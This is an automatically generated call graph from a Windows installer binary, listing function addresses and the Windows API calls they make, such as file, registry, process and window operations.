402acb 17 API calls 5042->5043 5044 40225a 5043->5044 5045 402acb 17 API calls 5044->5045 5046 402263 5045->5046 5047 40626d 2 API calls 5046->5047 5048 40226c 5047->5048 5049 402270 5048->5049 5050 40227d lstrlenA lstrlenA 5048->5050 5051 405091 24 API calls 5049->5051 5052 405091 24 API calls 5050->5052 5054 402278 5051->5054 5053 4022b9 SHFileOperationA 5052->5053 5053->5049 5053->5054 5055 4028cb 5056 402aa9 17 API calls 5055->5056 5057 4028d1 5056->5057 5058 4028e3 5057->5058 5059 402906 5057->5059 5061 40271c 5057->5061 5058->5061 5063 405ec8 wsprintfA 5058->5063 5060 405f8c 17 API calls 5059->5060 5059->5061 5060->5061 5063->5061 5064 4022cd 5065 4022d4 5064->5065 5069 4022e7 5064->5069 5066 405f8c 17 API calls 5065->5066 5067 4022e1 5066->5067 5068 405686 MessageBoxIndirectA 5067->5068 5068->5069 4326 4051cf 4327 4051f1 GetDlgItem GetDlgItem GetDlgItem 4326->4327 4328 40537a 4326->4328 4372 40403e SendMessageA 4327->4372 4330 405382 GetDlgItem CreateThread FindCloseChangeNotification 4328->4330 4331 4053aa 4328->4331 4330->4331 4395 405163 OleInitialize 4330->4395 4333 4053d8 4331->4333 4334 4053c0 ShowWindow ShowWindow 4331->4334 4335 4053f9 4331->4335 4332 405261 4339 405268 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4332->4339 4336 4053e0 4333->4336 4337 405433 4333->4337 4377 40403e SendMessageA 4334->4377 4381 404070 4335->4381 4341 4053e8 4336->4341 4342 40540c ShowWindow 4336->4342 4337->4335 4349 405440 SendMessageA 4337->4349 4347 4052d6 4339->4347 4348 4052ba SendMessageA SendMessageA 4339->4348 4378 403fe2 4341->4378 4345 40542c 4342->4345 4346 40541e 4342->4346 4344 405405 4351 403fe2 SendMessageA 4345->4351 4350 405091 24 API calls 4346->4350 4352 4052e9 4347->4352 4353 4052db SendMessageA 4347->4353 4348->4347 4349->4344 4354 405459 CreatePopupMenu 4349->4354 4350->4345 4351->4337 4373 404009 4352->4373 4353->4352 4355 405f8c 17 API calls 4354->4355 4357 405469 AppendMenuA 4355->4357 4361 405487 GetWindowRect 4357->4361 4362 40549a TrackPopupMenu 4357->4362 4358 4052f9 4359 405302 ShowWindow 4358->4359 4360 405336 GetDlgItem SendMessageA 4358->4360 4363 405318 ShowWindow 4359->4363 4366 405325 4359->4366 4360->4344 4365 40535d SendMessageA SendMessageA 4360->4365 4361->4362 4362->4344 4364 4054b6 4362->4364 4363->4366 4367 4054d5 SendMessageA 4364->4367 4365->4344 4376 40403e SendMessageA 4366->4376 4367->4367 4368 4054f2 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4367->4368 4370 405514 SendMessageA 4368->4370 4370->4370 4371 405536 GlobalUnlock SetClipboardData CloseClipboard 4370->4371 4371->4344 4372->4332 4374 405f8c 17 API calls 4373->4374 4375 404014 SetDlgItemTextA 4374->4375 4375->4358 4376->4360 4377->4333 4379 403fe9 4378->4379 4380 403fef SendMessageA 4378->4380 4379->4380 4380->4335 4382 404133 4381->4382 4383 404088 GetWindowLongA 4381->4383 4382->4344 4383->4382 4384 40409d 4383->4384 4384->4382 4385 4040ca GetSysColor 4384->4385 4386 4040cd 4384->4386 4385->4386 4387 4040d3 SetTextColor 4386->4387 4388 4040dd SetBkMode 4386->4388 4387->4388 4389 4040f5 GetSysColor 4388->4389 4390 4040fb 4388->4390 4389->4390 4391 404102 SetBkColor 4390->4391 4392 40410c 4390->4392 4391->4392 4392->4382 4393 404126 CreateBrushIndirect 4392->4393 4394 40411f DeleteObject 4392->4394 4393->4382 4394->4393 4402 404055 4395->4402 4397 405186 4401 4051ad 4397->4401 4405 401389 4397->4405 4398 404055 SendMessageA 4399 4051bf OleUninitialize 4398->4399 4401->4398 4403 40406d 4402->4403 4404 40405e SendMessageA 4402->4404 4403->4397 4404->4403 4406 401390 4405->4406 4407 4013fe 4406->4407 4408 4013cb MulDiv SendMessageA 4406->4408 4407->4397 4408->4406 5070 6dda15d5 5071 6dda14bb GlobalFree 5070->5071 5073 6dda15ed 5071->5073 5072 6dda1633 GlobalFree 5073->5072 5074 6dda1608 5073->5074 5075 6dda161f VirtualFree 5073->5075 5074->5072 5075->5072 5076 4020d1 5077 402acb 17 API calls 5076->5077 5078 4020d8 5077->5078 5079 402acb 17 API calls 5078->5079 5080 4020e2 5079->5080 5081 402acb 17 API calls 5080->5081 5082 4020ec 5081->5082 5083 402acb 17 API calls 5082->5083 5084 4020f6 5083->5084 5085 402acb 17 API calls 5084->5085 5087 402100 5085->5087 5086 402142 CoCreateInstance 5091 402161 5086->5091 5093 40220c 5086->5093 5087->5086 5088 402acb 17 API calls 5087->5088 5088->5086 5089 401423 24 API calls 5090 402242 5089->5090 5092 4021ec MultiByteToWideChar 5091->5092 5091->5093 5092->5093 5093->5089 5093->5090 5094 404454 5095 404464 5094->5095 5096 40448a 5094->5096 5097 404009 18 API calls 5095->5097 5098 404070 8 API calls 5096->5098 5099 404471 SetDlgItemTextA 5097->5099 5100 404496 5098->5100 5099->5096 5101 4026d4 5102 4026da 5101->5102 5103 4026de FindNextFileA 5102->5103 5106 4026f0 5102->5106 5104 40272f 5103->5104 5103->5106 5107 405f6a lstrcpynA 5104->5107 5107->5106 4621 4031d6 SetErrorMode GetVersion 4622 403217 4621->4622 4623 40321d 4621->4623 4624 406302 5 API calls 4622->4624 4625 406294 3 API calls 4623->4625 4624->4623 4626 403233 lstrlenA 4625->4626 4626->4623 4627 403242 4626->4627 4628 406302 5 API calls 4627->4628 4629 403249 4628->4629 4630 406302 5 API calls 4629->4630 4631 403250 4630->4631 4632 406302 5 API calls 4631->4632 4633 40325c #17 OleInitialize SHGetFileInfoA 4632->4633 4711 405f6a lstrcpynA 4633->4711 4636 4032a8 GetCommandLineA 4712 405f6a lstrcpynA 4636->4712 4638 4032ba 4639 40592d CharNextA 4638->4639 4640 4032e3 CharNextA 4639->4640 4648 4032f3 4640->4648 4641 4033bd 4642 4033d0 GetTempPathA 4641->4642 4713 4031a5 4642->4713 4644 4033e8 4645 403442 DeleteFileA 4644->4645 4646 4033ec GetWindowsDirectoryA lstrcatA 4644->4646 4723 402d63 GetTickCount GetModuleFileNameA 4645->4723 4649 4031a5 12 API calls 4646->4649 4647 40592d CharNextA 4647->4648 4648->4641 4648->4647 4652 4033bf 4648->4652 4651 403408 4649->4651 4651->4645 4654 40340c GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4651->4654 4814 405f6a lstrcpynA 4652->4814 4653 403456 4655 4034ec 4653->4655 4658 4034dc 4653->4658 4662 40592d CharNextA 4653->4662 4657 4031a5 12 API calls 4654->4657 4817 4036be 4655->4817 4660 40343a 4657->4660 4751 403798 4658->4751 4660->4645 4660->4655 4666 403471 4662->4666 4664 403624 4668 4036a6 ExitProcess 4664->4668 4669 40362c GetCurrentProcess OpenProcessToken 4664->4669 4665 403506 4824 405686 4665->4824 4672 4034b7 4666->4672 4673 40351c 4666->4673 4674 403677 4669->4674 4675 403647 LookupPrivilegeValueA AdjustTokenPrivileges 4669->4675 4676 4059f0 18 API calls 4672->4676 4807 4055f1 4673->4807 4678 406302 5 API calls 4674->4678 4675->4674 4679 4034c2 4676->4679 4681 40367e 4678->4681 4679->4655 4815 405f6a lstrcpynA 4679->4815 4684 403693 ExitWindowsEx 4681->4684 4687 40369f 4681->4687 4682 403532 lstrcatA 4683 40353d lstrcatA lstrcmpiA 4682->4683 4683->4655 4686 403559 4683->4686 4684->4668 4684->4687 4689 403565 4686->4689 4690 40355e 4686->4690 4691 40140b 2 API calls 4687->4691 4688 4034d1 4816 405f6a lstrcpynA 4688->4816 4833 4055d4 CreateDirectoryA 4689->4833 4828 405557 CreateDirectoryA 4690->4828 4691->4668 4696 40356a SetCurrentDirectoryA 4697 403584 4696->4697 4698 403579 4696->4698 4810 405f6a lstrcpynA 4697->4810 4836 405f6a lstrcpynA 4698->4836 4701 403592 4702 405f8c 17 API calls 4701->4702 4705 403618 4701->4705 4707 405d49 36 API calls 4701->4707 4708 405f8c 17 API calls 4701->4708 4710 403604 CloseHandle 4701->4710 4811 405609 CreateProcessA 4701->4811 4703 4035c3 DeleteFileA 4702->4703 4703->4701 4704 4035d0 CopyFileA 4703->4704 4704->4701 4706 405d49 36 API calls 4705->4706 4706->4655 4707->4701 4708->4701 4710->4701 4711->4636 4712->4638 4714 4061d4 5 API calls 4713->4714 4716 4031b1 4714->4716 4715 4031bb 4715->4644 4716->4715 4717 405902 3 API calls 4716->4717 4718 4031c3 4717->4718 4719 4055d4 2 API calls 4718->4719 4720 4031c9 4719->4720 4721 405b32 2 API calls 4720->4721 4722 4031d4 4721->4722 4722->4644 4837 405b03 GetFileAttributesA CreateFileA 4723->4837 4725 402da3 4746 402db3 4725->4746 4838 405f6a lstrcpynA 4725->4838 4727 402dc9 4728 405949 2 API calls 4727->4728 4729 402dcf 4728->4729 4839 405f6a lstrcpynA 4729->4839 4731 402dda GetFileSize 4732 402ed6 4731->4732 4744 402df1 4731->4744 4840 402cff 4732->4840 4734 402edf 4736 402f0f GlobalAlloc 4734->4736 4734->4746 4876 40318e SetFilePointer 4734->4876 4851 40318e SetFilePointer 4736->4851 4738 402f42 4742 402cff 6 API calls 4738->4742 4740 402ef8 4743 403178 ReadFile 4740->4743 4741 402f2a 4852 402f9c 4741->4852 4742->4746 4747 402f03 4743->4747 4744->4732 4744->4738 4744->4746 4748 402cff 6 API calls 4744->4748 4873 403178 4744->4873 4746->4653 4747->4736 4747->4746 4748->4744 4749 402f36 4749->4746 4749->4749 4750 402f73 SetFilePointer 4749->4750 4750->4746 4752 406302 5 API calls 4751->4752 4753 4037ac 4752->4753 4754 4037b2 4753->4754 4755 4037c4 4753->4755 4897 405ec8 wsprintfA 4754->4897 4756 405e51 3 API calls 4755->4756 4758 4037ef 4756->4758 4759 40380d lstrcatA 4758->4759 4761 405e51 3 API calls 4758->4761 4760 4037c2 4759->4760 4889 403a5d 4760->4889 4761->4759 4764 4059f0 18 API calls 4765 40383f 4764->4765 4766 4038c8 4765->4766 4768 405e51 3 API calls 4765->4768 4767 4059f0 18 API calls 4766->4767 4769 4038ce 4767->4769 4770 40386b 4768->4770 4771 4038de LoadImageA 4769->4771 4772 405f8c 17 API calls 4769->4772 4770->4766 4776 403887 lstrlenA 4770->4776 4779 40592d CharNextA 4770->4779 4773 403984 4771->4773 4774 403905 RegisterClassA 4771->4774 4772->4771 4775 40140b 2 API calls 4773->4775 4777 40393b SystemParametersInfoA CreateWindowExA 4774->4777 4806 40398e 4774->4806 4778 40398a 4775->4778 4780 403895 lstrcmpiA 4776->4780 4781 4038bb 4776->4781 4777->4773 4786 403a5d 18 API calls 4778->4786 4778->4806 4784 403885 4779->4784 4780->4781 4782 4038a5 GetFileAttributesA 4780->4782 4783 405902 3 API calls 4781->4783 4785 4038b1 4782->4785 4787 4038c1 4783->4787 4784->4776 4785->4781 4788 405949 2 API calls 4785->4788 4789 40399b 4786->4789 4898 405f6a lstrcpynA 4787->4898 4788->4781 4791 4039a7 ShowWindow 4789->4791 4792 403a2a 4789->4792 4794 406294 3 API calls 4791->4794 4793 405163 5 API calls 4792->4793 4795 403a30 4793->4795 4796 4039bf 4794->4796 4797 403a34 4795->4797 4798 403a4c 4795->4798 4799 4039cd GetClassInfoA 4796->4799 4801 406294 3 API calls 4796->4801 4804 40140b 2 API calls 4797->4804 4797->4806 4800 40140b 2 API calls 4798->4800 4802 4039e1 GetClassInfoA RegisterClassA 4799->4802 4803 4039f7 DialogBoxParamA 4799->4803 4800->4806 4801->4799 4802->4803 4805 40140b 2 API calls 4803->4805 4804->4806 4805->4806 4806->4655 4808 406302 5 API calls 4807->4808 4809 403521 lstrcatA 4808->4809 4809->4682 4809->4683 4810->4701 4812 405648 4811->4812 4813 40563c CloseHandle 4811->4813 4812->4701 4813->4812 4814->4642 4815->4688 4816->4658 4818 4036d6 4817->4818 4819 4036c8 CloseHandle 4817->4819 4900 403703 4818->4900 4819->4818 4822 405732 67 API calls 4823 4034f5 OleUninitialize 4822->4823 4823->4664 4823->4665 4825 40569b 4824->4825 4826 403514 ExitProcess 4825->4826 4827 4056af MessageBoxIndirectA 4825->4827 4827->4826 4829 403563 4828->4829 4830 4055a8 GetLastError 4828->4830 4829->4696 4830->4829 4831 4055b7 SetFileSecurityA 4830->4831 4831->4829 4832 4055cd GetLastError 4831->4832 4832->4829 4834 4055e4 4833->4834 4835 4055e8 GetLastError 4833->4835 4834->4696 4835->4834 4836->4697 4837->4725 4838->4727 4839->4731 4841 402d20 4840->4841 4842 402d08 4840->4842 4845 402d30 GetTickCount 4841->4845 4846 402d28 4841->4846 4843 402d11 DestroyWindow 4842->4843 4844 402d18 4842->4844 4843->4844 4844->4734 4847 402d61 4845->4847 4848 402d3e CreateDialogParamA ShowWindow 4845->4848 4877 40633e 4846->4877 4847->4734 4848->4847 4851->4741 4854 402fb2 4852->4854 4853 402fdd 4856 403178 ReadFile 4853->4856 4854->4853 4888 40318e SetFilePointer 4854->4888 4857 402fe8 4856->4857 4858 403118 4857->4858 4859 402ffa GetTickCount 4857->4859 4863 403102 4857->4863 4860 40311c 4858->4860 4862 403134 4858->4862 4864 40300d 4859->4864 4861 403178 ReadFile 4860->4861 4861->4863 4862->4863 4865 403178 ReadFile 4862->4865 4867 405baa WriteFile 4862->4867 4863->4749 4864->4863 4866 403178 ReadFile 4864->4866 4869 403073 GetTickCount 4864->4869 4870 40309c MulDiv wsprintfA 4864->4870 4872 405baa WriteFile 4864->4872 4881 406447 4864->4881 4865->4862 4866->4864 4867->4862 4869->4864 4871 405091 24 API calls 4870->4871 4871->4864 4872->4864 4874 405b7b ReadFile 4873->4874 4875 40318b 4874->4875 4875->4744 4876->4740 4878 40635b PeekMessageA 4877->4878 4879 406351 DispatchMessageA 4878->4879 4880 402d2e 4878->4880 4879->4878 4880->4734 4882 40646c 4881->4882 4883 406474 4881->4883 4882->4864 4883->4882 4884 406504 GlobalAlloc 4883->4884 4885 4064fb GlobalFree 4883->4885 4886 406572 GlobalFree 4883->4886 4887 40657b GlobalAlloc 4883->4887 4884->4882 4884->4883 4885->4884 4886->4887 4887->4882 4887->4883 4888->4853 4890 403a71 4889->4890 4899 405ec8 wsprintfA 4890->4899 4892 403ae2 4893 403b16 18 API calls 4892->4893 4895 403ae7 4893->4895 4894 40381d 4894->4764 4895->4894 4896 405f8c 17 API calls 4895->4896 4896->4895 4897->4760 4898->4766 4899->4892 4901 403711 4900->4901 4902 4036db 4901->4902 4903 403716 FreeLibrary GlobalFree 4901->4903 4902->4822 4903->4902 4903->4903 4904 4023d6 4905 402acb 17 API calls 4904->4905 4906 4023e8 4905->4906 4907 402acb 17 API calls 4906->4907 4908 4023f2 4907->4908 4921 402b5b 4908->4921 4911 40271c 4912 402427 4913 402433 4912->4913 4915 402aa9 17 API calls 4912->4915 4916 402452 RegSetValueExA 4913->4916 4918 402f9c 35 API calls 4913->4918 4914 402acb 17 API calls 4917 402420 lstrlenA 4914->4917 4915->4913 4919 402468 RegCloseKey 4916->4919 4917->4912 4918->4916 4919->4911 4922 402b76 4921->4922 4925 405e1e 4922->4925 4926 405e2d 4925->4926 4927 405e38 RegCreateKeyExA 4926->4927 4928 402402 4926->4928 4927->4928 4928->4911 4928->4912 4928->4914 5108 4014d6 5109 402aa9 17 API calls 5108->5109 5110 4014dc Sleep 5109->5110 5112 402957 5110->5112 5113 403756 5114 403761 5113->5114 5115 403765 5114->5115 5116 403768 GlobalAlloc 5114->5116 5116->5115 4929 401759 4930 402acb 17 API calls 4929->4930 4931 401760 4930->4931 4932 401786 4931->4932 4933 40177e 4931->4933 4970 405f6a lstrcpynA 4932->4970 4969 405f6a lstrcpynA 4933->4969 4936 401791 4938 405902 3 API calls 4936->4938 4937 401784 4940 4061d4 5 API calls 4937->4940 4939 401797 lstrcatA 4938->4939 4939->4937 4944 4017a3 4940->4944 4941 40626d 2 API calls 4941->4944 4942 4017e4 4945 405ade 2 API calls 4942->4945 4944->4941 4944->4942 4946 4017ba CompareFileTime 4944->4946 4947 40187e 4944->4947 4954 405f8c 17 API calls 4944->4954 4960 405f6a lstrcpynA 4944->4960 4965 405686 MessageBoxIndirectA 4944->4965 4967 401855 4944->4967 4968 405b03 GetFileAttributesA CreateFileA 4944->4968 4945->4944 4946->4944 4948 405091 24 API calls 4947->4948 4950 401888 4948->4950 4949 405091 24 API calls 4956 40186a 4949->4956 4951 402f9c 35 API calls 4950->4951 4952 40189b 4951->4952 4953 4018af SetFileTime 4952->4953 4955 4018c1 FindCloseChangeNotification 4952->4955 4953->4955 4954->4944 4955->4956 4957 4018d2 4955->4957 4958 4018d7 4957->4958 4959 4018ea 4957->4959 4961 405f8c 17 API calls 4958->4961 4962 405f8c 17 API calls 4959->4962 4960->4944 4963 4018df lstrcatA 4961->4963 4964 4018f2 4962->4964 4963->4964 4966 405686 MessageBoxIndirectA 4964->4966 4965->4944 4966->4956 4967->4949 4967->4956 4968->4944 4969->4937 4970->4936 5117 401659 5118 402acb 17 API calls 5117->5118 5119 40165f 5118->5119 5120 40626d 2 API calls 5119->5120 5121 401665 5120->5121 5122 401959 5123 402aa9 17 API calls 5122->5123 5124 401960 5123->5124 5125 402aa9 17 API calls 5124->5125 5126 40196d 5125->5126 5127 402acb 17 API calls 5126->5127 5128 401984 lstrlenA 5127->5128 5130 401994 5128->5130 5129 4019d4 5130->5129 5134 405f6a lstrcpynA 5130->5134 5132 4019c4 5132->5129 5133 4019c9 lstrlenA 5132->5133 5133->5129 5134->5132 5135 401cda 5136 402aa9 17 API calls 5135->5136 5137 401ce0 IsWindow 5136->5137 5138 401a0e 5137->5138 5146 401a5e 5147 402aa9 17 API calls 5146->5147 5148 401a67 5147->5148 5149 402aa9 17 API calls 5148->5149 5150 401a0e 5149->5150 5151 401f61 5152 402acb 17 API calls 5151->5152 5153 401f68 5152->5153 5154 406302 5 API calls 5153->5154 5155 401f77 5154->5155 5156 401ff7 5155->5156 5157 401f8f GlobalAlloc 5155->5157 5157->5156 5158 401fa3 5157->5158 5159 406302 5 API calls 5158->5159 5160 401faa 5159->5160 5161 406302 5 API calls 5160->5161 5162 401fb4 5161->5162 5162->5156 5166 405ec8 wsprintfA 5162->5166 5164 401feb 5167 405ec8 wsprintfA 5164->5167 5166->5164 5167->5156 5168 402561 5169 402acb 17 API calls 5168->5169 5170 402568 5169->5170 5173 405b03 GetFileAttributesA CreateFileA 5170->5173 5172 402574 5173->5172 5174 401563 5175 4028ff 5174->5175 5178 405ec8 wsprintfA 5175->5178 5177 402904 5178->5177 5179 4024e5 5180 402b0b 17 API calls 5179->5180 5181 4024ef 5180->5181 5182 402aa9 17 API calls 5181->5182 5183 4024f8 5182->5183 5184 40271c 5183->5184 5185 402513 RegEnumKeyA 5183->5185 5186 40251f RegEnumValueA 5183->5186 5187 402534 RegCloseKey 5185->5187 5186->5187 5187->5184 5196 40166a 5197 402acb 17 API calls 5196->5197 5198 401671 5197->5198 5199 402acb 17 API calls 5198->5199 5200 40167a 5199->5200 5201 402acb 17 API calls 5200->5201 5202 401683 MoveFileA 5201->5202 5203 401696 5202->5203 5209 40168f 5202->5209 5205 40626d 2 API calls 5203->5205 5207 402242 5203->5207 5204 401423 24 API calls 5204->5207 5206 4016a5 5205->5206 5206->5207 5208 405d49 36 API calls 5206->5208 5208->5209 5209->5204 5210 4047ec 5211 404818 5210->5211 5212 4047fc 5210->5212 5214 40484b 5211->5214 5215 40481e SHGetPathFromIDListA 5211->5215 5221 40566a GetDlgItemTextA 5212->5221 5217 40482e 5215->5217 5220 404835 SendMessageA 5215->5220 5216 404809 SendMessageA 5216->5211 5218 40140b 2 API calls 5217->5218 5218->5220 5220->5214 5221->5216 5222 4019ed 5223 402acb 17 API calls 5222->5223 5224 4019f4 5223->5224 5225 402acb 17 API calls 5224->5225 5226 4019fd 5225->5226 5227 401a04 lstrcmpiA 5226->5227 5228 401a16 lstrcmpA 5226->5228 5229 401a0a 5227->5229 5228->5229 5230 40156f 5231 401586 5230->5231 5232 40157f ShowWindow 5230->5232 5233 401594 ShowWindow 5231->5233 5234 402957 5231->5234 5232->5231 5233->5234 5235 402473 5236 402b0b 17 API calls 5235->5236 5237 40247d 5236->5237 5238 402acb 17 API calls 5237->5238 5239 402486 5238->5239 5240 402490 RegQueryValueExA 5239->5240 5243 40271c 5239->5243 5241 4024b6 RegCloseKey 5240->5241 5242 4024b0 5240->5242 5241->5243 5242->5241 5246 405ec8 wsprintfA 5242->5246 5246->5241 5247 4014f4 SetForegroundWindow 5248 402957 5247->5248 5249 404174 5251 404296 5249->5251 5252 40418a 5249->5252 5250 404305 5253 4043cf 5250->5253 5255 40430f GetDlgItem 5250->5255 5251->5250 5251->5253 5259 4042da GetDlgItem SendMessageA 5251->5259 5254 404009 18 API calls 5252->5254 5261 404070 8 API calls 5253->5261 5256 4041e0 5254->5256 5257 404325 5255->5257 5258 40438d 5255->5258 5260 404009 18 API calls 5256->5260 5257->5258 5266 40434b SendMessageA LoadCursorA SetCursor 5257->5266 5258->5253 5262 40439f 5258->5262 5282 40402b KiUserCallbackDispatcher 5259->5282 5264 4041ed CheckDlgButton 5260->5264 5265 4043ca 5261->5265 5267 4043a5 SendMessageA 5262->5267 5268 4043b6 5262->5268 5280 40402b KiUserCallbackDispatcher 5264->5280 5286 404418 5266->5286 5267->5268 5268->5265 5272 4043bc SendMessageA 5268->5272 5269 404300 5283 4043f4 5269->5283 5272->5265 5274 40420b GetDlgItem 5281 40403e SendMessageA 5274->5281 5277 404221 SendMessageA 5278 404248 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5277->5278 5279 40423f GetSysColor 5277->5279 5278->5265 5279->5278 5280->5274 5281->5277 5282->5269 5284 404402 5283->5284 5285 404407 SendMessageA 5283->5285 5284->5285 5285->5250 5289 40564c ShellExecuteExA 5286->5289 5288 40437e LoadCursorA SetCursor 5288->5258 5289->5288 5290 4065f6 5296 40647a 5290->5296 5291 406de5 5292 406504 GlobalAlloc 5292->5291 5292->5296 5293 4064fb GlobalFree 5293->5292 5294 406572 GlobalFree 5295 40657b GlobalAlloc 5294->5295 5295->5291 5295->5296 5296->5291 5296->5292 5296->5293 5296->5294 5296->5295 5297 406377 WaitForSingleObject 5298 406391 5297->5298 5299 4063a3 GetExitCodeProcess 5298->5299 5300 40633e 2 API calls 5298->5300 5301 406398 WaitForSingleObject 5300->5301 5301->5298 5302 6dda10e0 5311 6dda110e 5302->5311 5303 6dda11c4 GlobalFree 5304 6dda12ad 2 API calls 5304->5311 5305 6dda11c3 5305->5303 5306 6dda11ea GlobalFree 5306->5311 5307 6dda1266 2 API calls 5310 6dda11b1 GlobalFree 5307->5310 5308 6dda1155 GlobalAlloc 5308->5311 5309 6dda12d1 lstrcpyA 5309->5311 5310->5311 5311->5303 5311->5304 5311->5305 5311->5306 5311->5307 5311->5308 5311->5309 5311->5310 5312 401cfb 5313 402aa9 17 API calls 5312->5313 5314 401d02 5313->5314 5315 402aa9 17 API calls 5314->5315 5316 401d0e GetDlgItem 5315->5316 5317 40257d 5316->5317 5318 402c7c 5319 402ca4 5318->5319 5320 402c8b SetTimer 5318->5320 5321 402cf9 5319->5321 5322 402cbe MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5319->5322 5320->5319 5322->5321 5323 4022fc 5324 402304 5323->5324 5325 40230a 5323->5325 5327 402acb 17 API calls 5324->5327 5326 40231a 5325->5326 5328 402acb 17 API calls 5325->5328 5329 402acb 17 API calls 5326->5329 5331 402328 5326->5331 5327->5325 5328->5326 5329->5331 5330 402acb 17 API calls 5332 402331 WritePrivateProfileStringA 5330->5332 5331->5330 5333 4018fd 5334 401934 5333->5334 5335 402acb 17 API calls 5334->5335 5336 401939 5335->5336 5337 405732 67 API calls 5336->5337 5338 401942 5337->5338 5339 4026fe 5340 402acb 17 API calls 5339->5340 5341 402705 FindFirstFileA 5340->5341 5342 402728 5341->5342 5346 402718 5341->5346 5343 40272f 5342->5343 5347 405ec8 wsprintfA 5342->5347 5348 405f6a lstrcpynA 5343->5348 5347->5343 5348->5346 4991 6dda28e5 4992 6dda2935 4991->4992 4993 6dda28f5 VirtualProtect 4991->4993 4993->4992 5356 401000 5357 401037 BeginPaint GetClientRect 5356->5357 5358 40100c DefWindowProcA 5356->5358 5360 4010f3 5357->5360 5361 401179 5358->5361 5362 401073 CreateBrushIndirect FillRect DeleteObject 5360->5362 5363 4010fc 5360->5363 5362->5360 5364 401102 CreateFontIndirectA 5363->5364 5365 401167 EndPaint 5363->5365 5364->5365 5366 401112 6 API calls 5364->5366 5365->5361 5366->5365 5367 401900 5368 402acb 17 API calls 5367->5368 5369 401907 5368->5369 5370 405686 MessageBoxIndirectA 5369->5370 5371 401910 5370->5371 4069 402381 4070 4023b3 4069->4070 4071 402388 4069->4071 4072 402acb 17 API calls 4070->4072 4081 402b0b 4071->4081 4074 4023ba 4072->4074 4086 402b89 4074->4086 4077 402399 4079 402acb 17 API calls 4077->4079 4078 4023c7 4080 4023a0 RegDeleteValueA RegCloseKey 4079->4080 4080->4078 4082 402acb 17 API calls 4081->4082 4083 402b22 4082->4083 4084 405df0 RegOpenKeyExA 4083->4084 4085 40238f 4084->4085 4085->4077 4085->4078 4087 402b95 4086->4087 4088 402b9c 4086->4088 4087->4078 4088->4087 4090 402bcd 4088->4090 4091 405df0 RegOpenKeyExA 4090->4091 4092 402bfb 4091->4092 4093 402c21 RegEnumKeyA 4092->4093 4094 402c38 RegCloseKey 4092->4094 4095 402c59 RegCloseKey 4092->4095 4097 402bcd 6 API calls 4092->4097 4100 402c4c 4092->4100 4093->4092 4093->4094 4101 406302 GetModuleHandleA 4094->4101 4095->4100 4097->4092 4099 402c69 RegDeleteKeyA 4099->4100 4100->4087 4102 406328 GetProcAddress 4101->4102 4103 40631e 4101->4103 4105 402c48 4102->4105 4107 406294 GetSystemDirectoryA 4103->4107 4105->4099 4105->4100 4106 406324 4106->4102 4106->4105 4108 4062b6 wsprintfA LoadLibraryExA 4107->4108 4108->4106 5372 6dda2b9b 5373 6dda2bb3 5372->5373 5374 6dda1534 2 API calls 5373->5374 5375 6dda2bce 5374->5375 5376 401502 5377 40150a 5376->5377 5379 40151d 5376->5379 5378 402aa9 17 API calls 5377->5378 5378->5379 4110 402003 4111 402015 4110->4111 4113 4020c3 4110->4113 4112 402acb 17 API calls 4111->4112 4115 40201c 4112->4115 4114 401423 24 API calls 4113->4114 4121 402242 4114->4121 4116 402acb 17 API calls 4115->4116 4117 402025 4116->4117 4118 40203a LoadLibraryExA 4117->4118 4119 40202d GetModuleHandleA 4117->4119 4118->4113 4120 40204a GetProcAddress 4118->4120 4119->4118 4119->4120 4122 402096 4120->4122 4123 402059 4120->4123 4176 405091 4122->4176 4125 402061 4123->4125 4126 402078 4123->4126 4173 401423 4125->4173 4131 6dda16df 4126->4131 4127 402069 4127->4121 4129 4020b7 FreeLibrary 4127->4129 4129->4121 4132 6dda170f 4131->4132 4187 6dda1a9c 4132->4187 4134 6dda1716 4135 6dda1838 4134->4135 4136 6dda172e 4134->4136 4137 6dda1727 4134->4137 4135->4127 4219 6dda22b5 4136->4219 4235 6dda2273 4137->4235 4142 6dda1792 4146 6dda1798 4142->4146 4147 6dda17e0 4142->4147 4143 6dda1774 4248 6dda249c 4143->4248 4144 6dda175d 4158 6dda1753 4144->4158 4245 6dda2c7b 4144->4245 4145 6dda1744 4149 6dda174a 4145->4149 4154 6dda1755 4145->4154 4267 6dda156b 4146->4267 4152 6dda249c 11 API calls 4147->4152 4149->4158 4229 6dda29c0 4149->4229 4159 6dda17d1 4152->4159 4153 6dda177a 4259 6dda1559 4153->4259 4239 6dda2676 4154->4239 4158->4142 4158->4143 4164 6dda1827 4159->4164 4274 6dda2462 4159->4274 4161 6dda175b 4161->4158 4162 6dda249c 11 API calls 4162->4159 4164->4135 4166 6dda1831 GlobalFree 4164->4166 4166->4135 4170 6dda1813 4170->4164 4278 6dda14e2 wsprintfA 4170->4278 4172 6dda180c FreeLibrary 4172->4170 4174 405091 24 API calls 4173->4174 4175 401431 4174->4175 4175->4127 4177 4050ac 4176->4177 4186 40514f 4176->4186 4178 4050c9 lstrlenA 4177->4178 4179 405f8c 17 API calls 4177->4179 4180 4050f2 4178->4180 4181 4050d7 lstrlenA 4178->4181 4179->4178 4182 405105 4180->4182 4183 4050f8 SetWindowTextA 4180->4183 4184 4050e9 lstrcatA 4181->4184 4181->4186 4185 40510b SendMessageA SendMessageA SendMessageA 4182->4185 4182->4186 4183->4182 4184->4180 4185->4186 4186->4127 4281 6dda1215 GlobalAlloc 4187->4281 4189 6dda1ac0 4282 6dda1215 GlobalAlloc 4189->4282 4191 6dda1ce2 GlobalFree GlobalFree GlobalFree 4192 6dda1cff 4191->4192 4208 6dda1d49 4191->4208 4194 6dda20b5 4192->4194 4200 6dda1d14 4192->4200 4192->4208 4193 6dda1b9f GlobalAlloc 4213 6dda1acb 4193->4213 4195 6dda20d7 GetModuleHandleA 4194->4195 4194->4208 4198 6dda20e8 LoadLibraryA 4195->4198 4199 6dda20fd 4195->4199 4196 6dda1bea lstrcpyA 4202 6dda1bf4 lstrcpyA 4196->4202 4197 6dda1c08 GlobalFree 4197->4213 4198->4199 4198->4208 4289 6dda15c6 GetProcAddress 4199->4289 4200->4208 4285 6dda1224 4200->4285 4202->4213 4203 6dda214e 4205 6dda215b lstrlenA 4203->4205 4203->4208 4290 6dda15c6 GetProcAddress 4205->4290 4206 6dda1f99 4288 6dda1215 GlobalAlloc 4206->4288 4207 6dda2015 4207->4208 4212 6dda2059 lstrcpyA 4207->4212 4208->4134 4209 6dda210f 